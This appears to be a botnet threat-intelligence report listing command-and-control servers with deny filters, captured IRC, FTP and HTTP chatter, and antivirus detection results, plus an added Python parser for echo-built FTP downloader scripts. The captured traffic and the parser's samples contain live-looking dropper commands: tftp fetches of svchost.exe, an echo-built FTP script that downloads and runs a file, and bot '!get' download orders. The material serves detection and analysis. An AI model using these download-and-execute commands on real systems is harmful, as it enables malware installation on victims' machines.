  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
  • Client: NICK hxpxonzsUSER c020501 . . :-
  • Client: JOIN &virtu
  • Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Korgo.W
Avast: _Virtob
AVG: Korgo.D
BitDefender: Generic.1674959
CAT-QuickHeal: Virut.Z
ClamAV: MISSED
DrWeb: Lsabot
eSafe: Virut.n
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Korgo.W
F-Secure: Virut.av
Ikarus: Korgo.K
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Korgo.AB
NOD32v2: MISSED
Norman: Korgo.Y
Panda: Virutas.FG
Prevx1: MISSED
Rising: Junk.Virut.a
Sophos: Virut-W
Sunbelt: Generic!BT
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Korgo.AB
Webwasher-Gateway: MISSED

Priority: 4
TCP Ports: 6900
Filter: deny ip host 81.12.88.44 any log ! 4 infects 11/20/09 to 11/20/09 -
ISP: farhang arya communications company
Clients: 4
Country: iran, islamic republic of
Activity Domain: -
Chatter Example
  • Client: NICK Bisho911USER htiwa 0 0 :Bisho911
  • Server: :fart.bitchassness.shit NOTICE Bisho911 :*** If you are having...
  • Server: PONG :940FFB4F
  • Client: JOIN ##!X4
  • Client: USERHOST Bisho911MODE Bisho911 -x+iJOIN ##!X4 USERHOST...
  • Server: :fart.bitchassness.shit NOTICE Bisho911 :Setting/removing of...
  • Server: PONG :fart.bitchassness.shit

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 3
TCP Ports: 6668 6667
Filter: deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com
ISP: ovh sas
Clients: 3
Country: france
Activity Domain: gergosnet.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR mode.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
  • Client: USERHOST gyreobci
  • Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 3
TCP Ports: 5190 67
Filter: deny ip host 83.68.16.6 any log ! 3 infects 08/23/09 to 09/19/09 xs4all.nl
ISP: xs4all internet bv
Clients: 3
Country: netherlands
Activity Domain: xs4all.nl
Chatter Example
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Client: NICK znbXghHO
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Server: NICK znbXghHO
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...

BotClient Antivirus Diagnoses
AhnLab-V3: Win-Nepoe.58880
AntiVir: TRCrypt.XPACK.Gen
Authentium: Nepoe.A
Avast: MISSED
AVG: SHeur2.AIJS
BitDefender: IRC-Generic.5049
CAT-QuickHeal: Nepoe.hm
ClamAV: MISSED
DrWeb: Packed.162
eSafe: TRCrypt.XPACK
eTrust-Vet: Linkbot.VJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Nepoe.YW!tr
F-Prot: Nepoe.A
F-Secure: Nepoe.hm
Ikarus: Packer.Krunchy.B
Kaspersky: Nepoe.hm
McAfee: MISSED
Microsoft: Poebot
NOD32v2: MISSED
Norman: Smalltroj.dam
Panda: BckNepoe.F
Prevx1: MISSED
Rising: Undef.dnb
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: IRCBot
TheHacker: MISSED
TrendMicro: BKDR_NEPOE.CW
VBA32: Nepoe.hm
VirusBuster: Nepoe.DL
Webwasher-Gateway: MISSED

Priority: 2
TCP Ports: 65520 216
Filter: deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net
ISP: china unicom guangdong province network
Clients: 2
Country: china
Activity Domain: cncnet.net
Chatter Example
  • Client: NICK tztznbvfUSER f020501 . . :-
  • Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
  • Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Trojan-Downloader.Obitel
Kaspersky: MISSED
McAfee: MISSED
Microsoft: TrojanDownloader_Obitel.gen!C
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 2
TCP Ports: 13001 12351
Filter: deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in
ISP: abts-dsl-del
Clients: 2
Country: india
Activity Domain: 122.airtelbroadband.in
Chatter Example
  • Client: echo open 85.179.166.148 17323>.pif C:\WINDOWS\system32>
  • Client: echo user a a>>.pif C:\WINDOWS\system32>
  • Client: echo binary>>.pif C:\WINDOWS\system32>
  • Client: echo GET iexplorer.exe>>.pif C:\WINDOWS\system32>
  • Client: echo bye>>.pif C:\WINDOWS\system32>
  • Client: echo @echo off >c.batC:\WINDOWS\system32>
  • Client: echo ftp -n -v -s:.pif >>c.batC:\WINDOWS\system32>
  • Client: echo iexplorer.exe >>c.batC:\WINDOWS\system32>
  • Client: echo del .pif >>c.batC:\WINDOWS\system32>
  • Client: echo del /F c.bat >>c.batC:\WINDOWS\system32>
  • Client: echo exit /y >>c.batC:\WINDOWS\system32>
  • Client: USER a
  • Client: PASS a
  • Server: RETR iexplorer.exe
  • Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN #.has hs
  • Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
  • Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRSpy.Games.A
Authentium: STZ_like!Generic
Avast: MISSED
AVG: PolyCrypt
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: STZ_like!Generic
F-Secure: Suspicious_Malware!Gemini
Ikarus: Virut.n
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: Spy.Games.A
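The entry above shows the classic shell-driven FTP downloader: the bot builds an FTP script one echo at a time (open host port, user, binary, GET, bye), wraps it in a batch file that runs ftp -n -v -s:, launches the download and then deletes both files. The following is an added example, not code from the original page, that replays the echo redirections to rebuild each file, recognises the ones that are FTP scripts, extracts server, port, credentials and fetched file names, and checks whether the fetched file was then executed. It also handles the "&"-chained one-line variant seen in the jws.com entry further down. Both samples are constructed: the first from the lines above with the shell prompt text stripped, the second from the jws.com echo line with the user, password and file name taken from that entry's FTP exchange.

```python
import re

# Constructed sample, modelled on the echo-built FTP script in the entry above (prompt text stripped).
SAMPLE_SHELL = [
    "echo open 85.179.166.148 17323>.pif",
    "echo user a a>>.pif",
    "echo binary>>.pif",
    "echo GET iexplorer.exe>>.pif",
    "echo bye>>.pif",
    "echo @echo off >c.bat",
    "echo ftp -n -v -s:.pif >>c.bat",
    "echo iexplorer.exe >>c.bat",
    "echo del .pif >>c.bat",
    "echo del /F c.bat >>c.bat",
    "echo exit /y >>c.bat",
]
# Second constructed sample: the same technique '&'-chained onto one command line; the
# credentials and file name are assumed from the FTP exchange shown for the jws.com entry.
SAMPLE_ONELINER = ("echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo user anonymous bin>>cmd.ftp"
                   "&echo get 12394_upload.exe>>cmd.ftp&echo bye>>cmd.ftp&ftp -n -s:cmd.ftp&12394_upload.exe")

ECHO_RE = re.compile(r"^\s*echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)\s*$", re.I)
FTP_OPEN = re.compile(r"^open\s+(?P<host>\S+)(?:\s+(?P<port>\d+))?$", re.I)
FTP_USER = re.compile(r"^user\s+(?P<user>\S+)(?:\s+(?P<password>\S+))?$", re.I)
FTP_GET = re.compile(r"^(?:get|recv)\s+(?P<remote>\S+)(?:\s+(?P<local>\S+))?$", re.I)


def split_commands(line):
    """Split a cmd.exe line on '&', cmd.exe's command separator (quoting is not handled)."""
    return [c.strip() for c in line.split("&") if c.strip()]


def rebuild_files(lines):
    """Replay the echo redirections: '>' truncates, '>>' appends. Returns {filename: [lines]}."""
    files = {}
    for raw in lines:
        for cmd in split_commands(raw):
            m = ECHO_RE.match(cmd)
            if not m:
                continue
            name = m.group("file").lower()
            if m.group("op") == ">":
                files[name] = []
            files.setdefault(name, []).append(m.group("text"))
    return files


def extract_ftp_download(script_lines):
    """Pull server, port, credentials and fetched files out of a rebuilt 'ftp -s:' script."""
    info = {"host": None, "port": 21, "user": None, "password": None, "files": []}
    for line in script_lines:
        m = FTP_OPEN.match(line)
        if m:
            info["host"] = m.group("host")
            if m.group("port"):
                info["port"] = int(m.group("port"))
            continue
        m = FTP_USER.match(line)
        if m:
            info["user"], info["password"] = m.group("user"), m.group("password")
            continue
        m = FTP_GET.match(line)
        if m:
            info["files"].append(m.group("local") or m.group("remote"))
    return info


def find_ftp_droppers(lines):
    """Every rebuilt file that is an FTP script, plus whether the shell then ran what it fetched."""
    files = rebuild_files(lines)
    results = []
    for name, content in files.items():
        if not any(FTP_OPEN.match(entry) for entry in content):
            continue
        info = extract_ftp_download(content)
        info["script"] = name
        fetched = {f.lower() for f in info["files"]}
        # The payload is usually launched from a helper batch file or from the same command line.
        candidates = [c for body in files.values() for c in body]
        candidates += [c for raw in lines for c in split_commands(raw)]
        info["executed"] = sorted({c for c in candidates if c.lower() in fetched})
        results.append(info)
    return results


if __name__ == "__main__":
    for hit in find_ftp_droppers(SAMPLE_SHELL) + find_ftp_droppers([SAMPLE_ONELINER]):
        print(hit)
```

The rebuilt script is the indicator that matters: the FTP server, its non-standard port and the dropped file name survive even when the payload itself is gone from disk, and the "executed" field tells you whether the host needs to be treated as compromised rather than merely probed.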

Priority: 2
TCP Ports: 80
Filter: deny ip host 68.178.232.100 any log ! 2 infects 12/13/09 to 01/22/10 secureserver.net
ISP: godaddy.com inc
Clients: 2
Country: united states
Activity Domain: secureserver.net
Chatter Example
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /?245e7ff8 HTTP/1.1Accept: */*Accept-Language:...
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /sd?s=95308&f=1 HTTP/1.1Accept: */*Referer:...
  • Server: GET /sd?s=95308&f=1&C=1 HTTP/1.1Accept: */*Referer:...
  • Server: GET /apps/domainpark/show_afd_ads.js HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png?245e7ff8 HTTP/1.1Accept:...
  • Server: GET /images/061703/spc_trans.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_gdlogo.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/mrkt_250x80_4.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/tp250x80_7.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_saletag.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_parkedfreetext_b.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/but_search.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/tp468x60_7.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_prodadv.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ban_199_3.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/061703/but_go_orange_green.gif HTTP/1.1Accept:...
  • Server: GET /images/img_orangearrows.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/dbs_2.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/log_me.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_hosting.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_biz3.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/log_icann.png HTTP/1.1Accept: */*Referer:...
  • Server: GET / HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_footertext2.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/bul_blacksquare.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/bul_bluesquare.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_wst.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_gdauctions.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /assets/spc_trans.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_toplft.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_toprt.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_botlft.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_botrt.gif HTTP/1.1Accept: */*Referer:...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 2
TCP Ports: 3305
Filter: deny ip host 89.208.33.88 any log ! 2 infects 11/15/09 to 11/18/09 di-net.ru
ISP: hosting and colocation services
Clients: 2
Country: russian federation
Activity Domain: di-net.ru
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 67.55.178.248 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 67.55.178.248 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|i5vvaj0awUSER mlj7x67ke * 0 :USA|XP|867
  • Server: :hub.14020.net 001 P|i5vvaj0aw...
  • Client: USERHOST P|i5vvaj0aw
  • Server: :hub.14020.net 302 P|i5vvaj0aw...
  • Client: USERHOST P|i5vvaj0awMODE P|i5vvaj0aw JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: _Virtob
AVG: Virut
BitDefender: Virtob.8.Gen
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: HLLW.Piabot.4
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Virtob.8.Gen
Ikarus: Kolabc
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher-Gateway: MISSED

Priority: 2
TCP Ports: 2569 3938
Filter: deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com
ISP: netdirekt e.k
Clients: 2
Country: germany
Activity Domain: internetserviceteam.com
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 113.253.112.208 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 113.253.112.208 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
  • Client: NICK tiHIjEan
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your...
  • Client: MODE tiHIjEan +xi
  • Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
  • Client: JOIN ##russia## USERHOST tiHIjEan
  • Client: MODE ##russia## +smntu
  • Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: Palevo.jur.20
Authentium: MISSED
Avast: _Trojan-gen
AVG: Dropper.Generic.AYVO
BitDefender: Generic.2518038
CAT-QuickHeal: Agent.ATV
ClamAV: MISSED
DrWeb: IRC.Sdbot.5190
eSafe: TrojanProxyRan
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Pushbot
Kaspersky: P2P-Palevo.jur
McAfee: Autorun.aah
Microsoft: Malagent
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: IRCBot
TheHacker: MISSED
TrendMicro: TROJ_AGENT.ICZZ
VBA32: Kolab.ear
VirusBuster: P2P.Palevo.EAN
Webwasher-Gateway: MISSED

Priority: 1
TCP Ports: 18067
Filter: deny ip host 204.45.13.42 any log ! 1 infects 01/06/10 to 01/06/10 -
ISP: -
Clients: 1
Country: -
Activity Domain: -
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK l5-00029f63
  • Client: PoNG :8BC55D68
  • Server: :a 001 l5-00029f63 :l5-00029f63 MODE l5-00029f63 :+i
  • Client: USeRHOST l5-00029f63
  • Client: JOiN #l5t3 dlrowymx0ri
  • Server: :l5-00029f63!l@192.168.1.160 JOIN :#l5t3

BotClient Antivirus Diagnoses
AhnLab-V3: Win-Small.6694
AntiVir: BDSSmall.EO
Authentium: BAE
Avast: _Trojano-1124
AVG: Small.27.AQ
BitDefender: Generic.24785
CAT-QuickHeal: Small.eo
ClamAV: SdBot-730
DrWeb: Restrict
eSafe: Stration
eTrust-Vet: Cuebot.E
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: RPC.WALLZ!worm
F-Prot: BAE
F-Secure: Small.eo
Ikarus: IM-Opanki.O
Kaspersky: Small.eo
McAfee: Sdbot.gen
Microsoft: Small.BX
NOD32v2: MISSED
Norman: Suspicious_M.gen
Panda: BckSmall.HI
Prevx1: MISSED
Rising: Mocbot.a
Sophos: Hwbot-A
Sunbelt: MISSED
Symantec: Trojan
TheHacker: BackdoorSmall.eo
TrendMicro: BKDR_SDBOT.GAA
VBA32: Small.eo
VirusBuster: Small.AEE
Webwasher-Gateway: MISSED

Priority: 1
TCP Ports: 6667
Filter: deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com
ISP: psinet inc
Clients: 1
Country: united states
Activity Domain: cogentco.com
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
  • Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314

BotClient Antivirus Diagnoses
AhnLab-V3: Parite
AntiVir: Parite
Authentium: Korgo.V
Avast: _Parite
AVG: Korgo.A
BitDefender: Padobot.BV.Dam
CAT-QuickHeal: Perite.B
ClamAV: Padobot.M
DrWeb: Lsabot
eSafe: _Parite_B
eTrust-Vet: Pinfi.A
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Parite.B
F-Prot: Korgo.V
F-Secure: Padobot.BV.Dam
Ikarus: Padobot.M
Kaspersky: Padobot.m
McAfee: Pate.b
Microsoft: Korgo.V
NOD32v2: MISSED
Norman: Korgo.V
Panda: Korgo.U.worm
Prevx1: MISSED
Rising: Parite.b
Sophos: Parite-B
Sunbelt: MISSED
Symantec: Pinfi
TheHacker: Pate.B
TrendMicro: PE_PARITE.A
VBA32: Parite.B
VirusBuster: Padobot.D
Webwasher-Gateway: MISSED

Priority: 1
TCP Ports: 16667
Filter: deny ip host 92.243.19.221 any log ! 1 infects 01/18/10 to 01/18/10 ghst.net
ISP: gandi dedicated hosting servers
Clients: 1
Country: france
Activity Domain: ghst.net
Chatter Example
  • Client: NICK [USA]XP-SP0[00]1198USER glplur 0 0...
  • Server: :MBoY.Org NOTICE AUTH :*** Looking up your hostname...
  • Server: :MBoY.Org NOTICE AUTH :*** Couldn't resolve your hostname;...
  • Server: Org 422 [USA]XP-SP0[00]1198 :MOTD File is...
  • Client: USERHOST [USA]XP-SP0[00]1198
  • Client: MODE [USA]XP-SP0[00]1198 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Client: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: GET /error/404.phtml HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: + \google-analytics.com/ga.js\'...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com MODE #l# +m
  • Server: :|!X@admin.com MODE #l# +m
  • Server: PONG :MBoY.Org
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 1
TCP Ports: 3308
Filter: deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi
ISP: nebula oy. web hosting pri-dns and streaming
Clients: 1
Country: finland
Activity Domain: nebula.fi
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 125.4.228.60 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 125.4.228.60 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
  • Server: :hub.82.net 001 P|m80s5khyj...
  • Client: USERHOST P|m80s5khyj
  • Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
  • Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: _Virtob
AVG: Virut
